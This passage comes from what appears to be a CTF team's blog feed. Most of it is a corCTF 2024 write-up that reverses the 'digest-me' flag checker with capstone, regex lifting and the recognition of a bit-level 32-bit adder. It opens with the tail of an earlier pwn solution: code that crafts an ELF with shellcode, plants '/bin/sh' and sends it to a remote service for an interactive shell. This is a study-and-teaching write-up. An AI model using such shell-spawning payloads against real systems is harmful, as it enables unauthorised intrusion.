</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x18</span><span class="p">]</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">tmp</span><span class="p">)</span> <span class="c1"># trick 2: change e_entry so that it's immediately after the Ph
</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x20</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x38</span> <span class="c1"># trick 1: shifting the start of Ph by changing e_phoff 
</span>    <span class="n">tmp</span><span class="p">[</span><span class="mh">0x3c</span><span class="p">]</span> <span class="o">=</span> <span class="mh">0x5</span> <span class="c1"># trick 1: change the end of the ELF header so that the overlay works
</span>    <span class="n">bs</span> <span class="o">+=</span> <span class="n">tmp</span>

<span class="c1"># from `nasm -f bin -o sc sc.asm`
</span><span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'./sc'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">sc</span><span class="p">:</span> <span class="c1"># append the shellcode from above
</span>    <span class="n">arr</span> <span class="o">=</span> <span class="n">sc</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>
    <span class="n">bs</span> <span class="o">+=</span> <span class="n">arr</span> 
    <span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">p64</span><span class="p">(</span><span class="mh">0x0068732f6e69622f</span><span class="p">)):</span> <span class="c1"># trick 3
</span>        <span class="n">bs</span><span class="p">[</span><span class="mh">0x8</span> <span class="o">+</span> <span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">b</span>

<span class="n">io</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="nb">bytes</span><span class="p">(</span><span class="n">bs</span><span class="p">))</span>

<span class="n">io</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span>
</code></pre></div></div>]]></content><author><name>notbean</name></author><summary type="html"><![CDATA[Ayyy misc pwn.]]></summary></entry><entry><title type="html">[corCTF 2024] digest-me</title><link href="https://maplebacon.org/2024/07/corctf-digest-me/" rel="alternate" type="text/html" title="[corCTF 2024] digest-me" /><published>2024-07-29T00:00:00+00:00</published><updated>2024-07-29T00:00:00+00:00</updated><id>https://maplebacon.org/2024/07/corctf-digest-me</id><content type="html" xml:base="https://maplebacon.org/2024/07/corctf-digest-me/"><![CDATA[<p>Having no solves yet in the rev category with one day remaining in corCTF 2024, I decided to have a
gander at something that looked approachable. The two easiest challenges at the time by solve count
were <em>corMine: The Beginning</em> and its sequel <em>corMine 2: Revelations</em>, which was a game of some sort.
However, I eventually gave up after 5+ minutes trying to get the game to just <strong>run</strong>! But I guess I
don’t feel so bad seeing as my teammates couldn’t figure it out either :’)</p>

<figure class="image">
    <img src="/assets/images/corctf2024/wtf.png" />
    <figcaption>corMine refusing to run without a GPU smh</figcaption>
</figure>

<p>The next easiest one on the list was called <em>digest-me</em>, which is the topic of this post and what
I poured most of my time into for the next 24 hours. Luckily, this one was a simple binary that asked
you to input a flag, and told you whether it was correct. These kinds of programs are common enough
in CTFs that they have earned a not-so-special name: the <em>flag checker</em>.</p>

<h3 id="challenge">Challenge</h3>

<p>The description gives us a few clues: perhaps it has something to do with <strong>hashing</strong> and <strong>bits</strong>
(?), but otherwise just contains the average lore.</p>

<blockquote>
  <p>FizzBuzz101 was innocently writing a new, top-secret compiler when his computer was Crowdstriked.
Worse, the recovery key is behind a hasher that he wrote and compiled himself, and he can’t
remember how the bits work! Can you help him get his life’s work back?</p>
</blockquote>

<p>Here is a sample interaction from the <code class="language-plaintext highlighter-rouge">digestme</code> binary:</p>

<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>./digestme
Welcome!
Please enter the flag here:
corctf<span class="o">{</span>what<span class="o">}</span>
Try again:
corctf<span class="o">{</span>potatoes<span class="o">}</span>
Try again:
</code></pre></div></div>

<h3 id="its-too-big">It’s too big</h3>

<p>One problem immediately came up when opening the program in Ghidra – it refused to decompile
<code class="language-plaintext highlighter-rouge">main()</code>! Examining the disassembly to see what could possibly have gone wrong, I was horrified to
witness a chain of about 300,000 instructions consisting solely of <code class="language-plaintext highlighter-rouge">mov</code>, <code class="language-plaintext highlighter-rouge">and</code>, <code class="language-plaintext highlighter-rouge">or</code> and <code class="language-plaintext highlighter-rouge">xor</code>:</p>

<p><img src="/assets/images/corctf2024/mov.png" alt="mov.png" /></p>

<p>Luckily, I worked around this by patching in <code class="language-plaintext highlighter-rouge">ret</code> instructions near the top and bottom of <code class="language-plaintext highlighter-rouge">main()</code> so
that Ghidra wouldn’t try to decompile all of it. That finally let us see the start of the
function.</p>

<p><img src="/assets/images/corctf2024/decomp1.png" alt="decomp1.png" /></p>

<h3 id="brute-force">Brute force?</h3>

<p>Through a combination of static and dynamic analysis, I was able to constrain the flag to a set of
preconditions that were enforced by those <code class="language-plaintext highlighter-rouge">if</code>s:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>len(flag) == 19
flag[:7] == "corctf{"
flag[8] == flag[17]
flag[9] == flag[11]
flag[7] == flag[16] + 1
flag[14] == flag[16] + 4
</code></pre></div></div>

<p>The short flag certainly raised my eyebrows about the possibility of brute force. There were 11
unknown bytes but 4 of those can be disregarded because of the extra constraints, for a total of
<code class="language-plaintext highlighter-rouge">95^7 = 69,833,729,609,375</code> possible flags (assuming the flag is printable).</p>

<p>However, it’s worth noting that each run would require <em>at least</em> 300,000 instructions, and 2 days
would not be nearly enough to find the flag on my poor <code class="language-plaintext highlighter-rouge">4-core Intel-i5</code> laptop.</p>
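
<p>To put rough numbers on that, here is a back-of-the-envelope sketch. The throughput figure
(<code class="language-plaintext highlighter-rouge">RUNS_PER_SECOND</code>) is purely an assumption for illustration, not a measured value, so treat the
result as an order-of-magnitude estimate only.</p>

```python
# Back-of-the-envelope estimate of the brute-force cost.
PRINTABLE = 95          # printable ASCII characters (0x20..0x7e)
FREE_BYTES = 11 - 4     # 11 unknown bytes, 4 of them fixed by the extra constraints

candidates = PRINTABLE ** FREE_BYTES

# ASSUMPTION: a hypothetical throughput of one million full checker runs per
# second across all cores. This is an illustrative number, not a measurement.
RUNS_PER_SECOND = 1_000_000

seconds = candidates / RUNS_PER_SECOND
days = seconds / 86_400

print(f"{candidates:,} candidates")
print(f"~{days:,.0f} days at {RUNS_PER_SECOND:,} runs/s")
```

<p>Even under that generous assumption the search would take roughly 800 days, so brute force was
off the table.</p>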

<p><img src="/assets/images/corctf2024/decomp2.png" alt="decomp2.png" /></p>

<p>The rest of the program is focused on executing the aforementioned 300,000 instructions, which, judging by the
disassembly, just seem to be a bunch of operations on an array that I’ll call <code class="language-plaintext highlighter-rouge">A</code>. It is initialized at the start via
<code class="language-plaintext highlighter-rouge">A = (byte *)calloc(1,100000)</code>, which allocates a zero-filled 100,000-byte array.</p>

<p>The flag is then loaded into <code class="language-plaintext highlighter-rouge">A</code> by converting each byte inside <code class="language-plaintext highlighter-rouge">corctf{...}</code> into 8 bits, and then
storing the bits, one per array element, starting at <code class="language-plaintext highlighter-rouge">A[0x940]</code> in big-endian (most significant bit first) order. For those who speak
Python, that looks something like this:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0x940</span><span class="p">:</span><span class="mh">0x998</span><span class="p">]</span> <span class="o">=</span> <span class="p">[(</span><span class="n">c</span> <span class="o">&gt;&gt;</span> <span class="n">i</span><span class="p">)</span> <span class="o">&amp;</span> <span class="mi">1</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">flag</span><span class="p">[</span><span class="mi">7</span><span class="p">:</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">7</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">,</span> <span class="o">-</span><span class="mi">1</span><span class="p">)]</span>
</code></pre></div></div>
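
<p>For anyone who wants to play with that layout, here is a slightly longer, self-contained sketch
with a round trip back to bytes. The helper names (<code class="language-plaintext highlighter-rouge">bytes_to_bits</code>, <code class="language-plaintext highlighter-rouge">bits_to_bytes</code>) and the
placeholder flag are made up for illustration; the placeholder only has the right length and prefix
and does not satisfy the other preconditions.</p>

```python
def bytes_to_bits(data: bytes) -> list[int]:
    """Expand each byte into 8 bits, most significant bit first."""
    return [(c >> i) & 1 for c in data for i in range(7, -1, -1)]


def bits_to_bytes(bits: list[int]) -> bytes:
    """Inverse of bytes_to_bits: pack groups of 8 MSB-first bits into bytes."""
    out = bytearray()
    for k in range(0, len(bits), 8):
        byte = 0
        for bit in bits[k:k + 8]:
            byte = (byte << 1) | bit
        out.append(byte)
    return bytes(out)


# ASSUMPTION: a made-up 19-character placeholder, not the real flag.
flag = b"corctf{AAAAAAAAAAA}"

A = [0] * 100_000                      # one cell per bit, like calloc(1, 100000)
A[0x940:0x998] = bytes_to_bits(flag[7:-1])

print(A[0x940:0x948])                  # the 8 bits of the first unknown byte
print(bits_to_bytes(A[0x940:0x998]))   # round trip back to the 11 inner bytes
```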

<p>After the extremely long chain of array operations, the first 128 bits of <code class="language-plaintext highlighter-rouge">A</code> are converted into
four 32-bit integers (call them <code class="language-plaintext highlighter-rouge">a, b, c, d</code>). The flag checker outputs <code class="language-plaintext highlighter-rouge">Nice!</code> if
<code class="language-plaintext highlighter-rouge">c == 0x19c603b</code> and <code class="language-plaintext highlighter-rouge">d == 0x14353ce</code> (A.K.A. the target condition).</p>

<h3 id="reversing-the-elephant-in-the-room">Reversing the elephant in the room</h3>

<p>Now that it was clear how the program was checking the flag, I worked on parsing the long array
operations into something more readable. Once we had the instructions in a higher-level language, it
would be possible in theory to rely on z3 to recover the flag for us.</p>

<p>Instead of bashing Ghidra to decompile everything for us, I used <code class="language-plaintext highlighter-rouge">capstone</code> to parse the machine
code into a clean disassembly:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'digestme'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">binary</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

<span class="n">code</span> <span class="o">=</span> <span class="n">binary</span><span class="p">[</span><span class="mh">0x1290</span><span class="p">:</span><span class="mh">0xed854</span><span class="p">]</span>

<span class="n">cs</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
<span class="n">instructions</span> <span class="o">=</span> <span class="n">cs</span><span class="p">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>

<span class="k">for</span> <span class="n">inst</span> <span class="ow">in</span> <span class="n">instructions</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
</code></pre></div></div>

<p>After combing through the output, I was surprised to find only two distinct groups of instructions.
Each one was either a simple <code class="language-plaintext highlighter-rouge">mov</code> of the form</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov byte ptr [rax + X], Y
</code></pre></div></div>

<p>which maps to <code class="language-plaintext highlighter-rouge">A[X] = Y</code>, or</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mov cl, byte ptr [rax + X]
&lt;op&gt; cl, byte ptr [rax + Y]
mov byte ptr [rax + Z], cl
</code></pre></div></div>

<p>which maps to <code class="language-plaintext highlighter-rouge">A[Z] = A[X] &lt;op&gt; A[Y]</code> where <code class="language-plaintext highlighter-rouge">&lt;op&gt; ∈ [and, or, xor]</code>.</p>

<p>This made it relatively easy to decompile with a little bit of regex:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">capstone</span> <span class="kn">import</span> <span class="o">*</span>
<span class="kn">import</span> <span class="nn">re</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'digestme'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="n">binary</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span>

<span class="n">OP_MAP</span> <span class="o">=</span> <span class="p">{</span><span class="s">'and'</span><span class="p">:</span> <span class="s">'&amp;'</span><span class="p">,</span> <span class="s">'or'</span><span class="p">:</span> <span class="s">'|'</span><span class="p">,</span> <span class="s">'xor'</span><span class="p">:</span> <span class="s">'^'</span><span class="p">}</span>

<span class="n">code</span> <span class="o">=</span> <span class="n">binary</span><span class="p">[</span><span class="mh">0x1290</span><span class="p">:</span><span class="mh">0xed854</span><span class="p">]</span>

<span class="n">cs</span> <span class="o">=</span> <span class="n">Cs</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">)</span>
<span class="n">instructions</span> <span class="o">=</span> <span class="n">cs</span><span class="p">.</span><span class="n">disasm</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>

<span class="n">commands</span> <span class="o">=</span> <span class="p">[]</span>

<span class="k">while</span> <span class="p">(</span><span class="n">inst</span> <span class="p">:</span><span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">,</span> <span class="bp">None</span><span class="p">))</span> <span class="ow">is</span> <span class="ow">not</span> <span class="bp">None</span><span class="p">:</span>
    <span class="k">assert</span> <span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span> <span class="o">==</span> <span class="s">'mov'</span>

    <span class="k">if</span> <span class="n">m</span> <span class="p">:</span><span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'byte ptr \[rax( \+ (\w+)|)\], ([01])'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">):</span>
        <span class="n">out</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>
        <span class="n">val</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">3</span><span class="p">])</span>
        <span class="n">commands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">out</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] = </span><span class="si">{</span><span class="n">val</span><span class="si">}</span><span class="s">'</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'cl, byte ptr \[rax( \+ (\w+)|)\]'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
        <span class="n">in1</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>

        <span class="n">inst</span> <span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">)</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'cl, byte ptr \[rax( \+ (\w+)|)\]'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
        <span class="n">in2</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>
        <span class="n">op</span> <span class="o">=</span> <span class="n">OP_MAP</span><span class="p">[</span><span class="n">inst</span><span class="p">.</span><span class="n">mnemonic</span><span class="p">]</span>

        <span class="n">inst</span> <span class="o">=</span> <span class="nb">next</span><span class="p">(</span><span class="n">instructions</span><span class="p">)</span>
        <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'byte ptr \[rax( \+ (\w+)|)\], cl'</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">op_str</span><span class="p">)</span>
        <span class="n">out</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="mi">0</span><span class="p">)</span> <span class="k">if</span> <span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span>

        <span class="n">commands</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="sa">f</span><span class="s">'A[</span><span class="si">{</span><span class="n">out</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] = A[</span><span class="si">{</span><span class="n">in1</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">] </span><span class="si">{</span><span class="n">op</span><span class="si">}</span><span class="s"> A[</span><span class="si">{</span><span class="n">in2</span><span class="si">:</span><span class="c1">#x</span><span class="si">}</span><span class="s">]'</span><span class="p">)</span>

<span class="k">print</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">commands</span><span class="p">))</span>

<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'commands.txt'</span><span class="p">,</span> <span class="s">'w'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
    <span class="k">for</span> <span class="n">cmd</span> <span class="ow">in</span> <span class="n">commands</span><span class="p">:</span>
        <span class="n">f</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">cmd</span> <span class="o">+</span> <span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span>
</code></pre></div></div>

<p>I also printed out the number of commands, which came out at a respectable 60,180. Still far from
ideal, of course.</p>

<p>Given the description of the challenge, I figured this was some hashing algorithm that was
obfuscated by bit manipulations. Looking through the <code class="language-plaintext highlighter-rouge">commands.txt</code> file, I noticed that there was a
lot of repetition. In fact, it almost always performed one of <code class="language-plaintext highlighter-rouge">&amp;</code>, <code class="language-plaintext highlighter-rouge">|</code>, or <code class="language-plaintext highlighter-rouge">^</code> in 32-bit chunks like
this:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0x0</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa0</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x100</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x1</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa1</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x101</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x2</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa2</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x102</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x3</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfa3</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x103</span><span class="p">]</span>
<span class="p">...</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0x1f</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xfbf</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x11f</span><span class="p">]</span>
</code></pre></div></div>
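
<p>To see why a run of 32 single-bit commands like this can be collapsed into one word-sized
operation, here is a small sanity-check sketch. The <code class="language-plaintext highlighter-rouge">pack</code> helper is hypothetical, and the bit layout
it uses is an assumption borrowed from the conversion script further down; for purely bitwise
operations any consistent layout leads to the same conclusion.</p>

```python
import random


def pack(bits):
    """Pack 32 bit cells into one integer.

    ASSUMPTION: cell i holds bit 8*(i//8) + 7 - (i%8) of the word, i.e. bytes
    in little-endian order with the bits stored MSB-first inside each byte.
    """
    word = 0
    for i, bit in enumerate(bits):
        word |= bit << (8 * (i // 8) + 7 - (i % 8))
    return word


random.seed(0)
x_bits = [random.randint(0, 1) for _ in range(32)]
y_bits = [random.randint(0, 1) for _ in range(32)]

# 32 single-bit commands, one per cell, as in the listing above ...
out_bits = [x | y for x, y in zip(x_bits, y_bits)]

# ... are equivalent to a single 32-bit OR on the packed words.
assert pack(out_bits) == pack(x_bits) | pack(y_bits)
```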

<p>However, there were also certain chunks that had all the operators combined in a mixed order, which
strangely always came in groups of 157 that repeated <code class="language-plaintext highlighter-rouge">^, ^, &amp;, &amp;, |</code> cyclically.</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">A</span><span class="p">[</span><span class="mh">0xe7</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc7</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x27</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc7</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x27</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc6</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x26</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe6</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc6</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x26</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc5</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x25</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe5</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc5</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x25</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">|</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xc4</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0x24</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xe4</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">^</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
<span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span> <span class="o">=</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb41</span><span class="p">]</span> <span class="o">&amp;</span> <span class="n">A</span><span class="p">[</span><span class="mh">0xb40</span><span class="p">]</span>
</code></pre></div></div>

<p>At first, this made me scratch my head as it did not seem to “fit” with the rest of the output. But
then I realized that this obscure-looking block of code was actually implementing a 32-bit adder!</p>
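
<p>One way to convince yourself that the pattern above really is an adder is to rebuild it by hand.
The following is a minimal sketch rather than the binary’s exact layout: it assumes bit lists
indexed from the least significant bit, and the helper names (<code class="language-plaintext highlighter-rouge">add32_bits</code>, <code class="language-plaintext highlighter-rouge">to_bits</code>,
<code class="language-plaintext highlighter-rouge">from_bits</code>) are made up for illustration. Bit 0 needs 2 operations and each of the remaining 31
bits needs 5, which is consistent with the groups of 157 (2 + 31 × 5).</p>

```python
def add32_bits(a, b):
    """Add two 32-bit values given as bit lists (index 0 = least significant).

    Uses only ^, & and |, one bit position at a time.
    """
    out = [0] * 32
    # Bit 0 is a half adder: 2 operations.
    out[0] = a[0] ^ b[0]
    carry = a[0] & b[0]
    # Bits 1..31 are full adders: 5 operations each (^, ^, &, &, |).
    for i in range(1, 32):
        t = a[i] ^ b[i]
        out[i] = t ^ carry
        carry = t & carry
        t = a[i] & b[i]
        carry = t | carry
    return out  # the final carry is dropped, i.e. addition modulo 2**32


def to_bits(n):
    """Split an integer into 32 bits, least significant bit first."""
    return [(n >> i) & 1 for i in range(32)]


def from_bits(bits):
    """Rebuild an integer from LSB-first bits."""
    return sum(bit << i for i, bit in enumerate(bits))


x, y = 0xDEADBEEF, 0x12345678
assert from_bits(add32_bits(to_bits(x), to_bits(y))) == (x + y) % 2**32
```

<p>The two temporaries <code class="language-plaintext highlighter-rouge">t</code> and <code class="language-plaintext highlighter-rouge">carry</code> play the same role as the scratch cells <code class="language-plaintext highlighter-rouge">A[0xb41]</code> and
<code class="language-plaintext highlighter-rouge">A[0xb40]</code> in the listing.</p>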

<p>This finally made sense with the rest of the logic, and once I was certain that these were all
indeed 32-bit operations implemented on bits, I quickly hacked together a second program to convert
the 60,180 commands into a new set of commands performed on 32-bit integers:</p>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">re</span>

<span class="k">def</span> <span class="nf">MOV</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
    <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'A\[(\w+)\] = ([01])'</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span>
    <span class="k">if</span> <span class="n">m</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">return</span> <span class="bp">None</span>
    <span class="k">return</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="mi">0</span><span class="p">),</span> <span class="nb">int</span><span class="p">(</span><span class="n">m</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span>

<span class="k">def</span> <span class="nf">BITW</span><span class="p">(</span><span class="n">cmd</span><span class="p">):</span>
    <span class="n">m</span> <span class="o">=</span> <span class="n">re</span><span class="p">.</span><span class="n">fullmatch</span><span class="p">(</span><span class="sa">r</span><span class="s">'A\[(\w+)\] = A\[(\w+)\] ([\^|&amp;]) A\[(\w+)\]'</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span>
